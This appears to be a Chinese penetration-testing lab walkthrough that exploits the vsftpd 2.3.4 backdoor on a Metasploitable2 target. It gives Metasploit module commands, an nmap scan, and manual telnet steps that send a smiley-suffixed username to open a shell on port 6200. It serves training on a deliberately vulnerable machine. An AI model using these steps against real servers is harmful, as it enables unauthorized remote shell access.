准备写一个专门关于端口渗透的一些小集合,每一篇代表一个端口对应的渗透方法,算不上什么牛逼的技术,但是对于实战时候还是具有一定的参考价值,之前已经发放了大概4-5枚的知识星球邀请码,如想加入可扫描二维码或直接来稿。
>use auxiliary/scanner/ftp/ftp_version探测版本 >search vsFTPd 2.3.4 版本号>use exploit/unix/ftp/vsftpd_234_backdoor>show options
操作:打开kali linux的命令控制台,输入msfconsole。
实验现象截图:
操作:nmap -p0-65535 192.168.1.145
实验现象截图:
Metasploitable2(靶机) 在21端口上运行着vsftpd服务,一个使用广泛的FTP服务。这个特别的版本包含一个后门允许一个未知的入侵者进入核心代码。这个后门很快就被确认并且移除。但是移除之前已经被少数人下载下来。如果在发送的用户名后面加上”:)“(笑脸符号),这个版本的后门会在6200端口上打开一个监听的shell。我们可以通过telnet确认或者通过metasploit的攻击模块自动攻击
操作:root@kali:~# telnet 192.168.1.145 21
实验现象截图:
操作:发送一个用户名并且后面加上”:)“(笑脸符号),和密码
user backdoored:)
Pass invalid
实验现象截图:
操作:root@kali:~# telnet 192.168.1.145 6200
实验现象截图: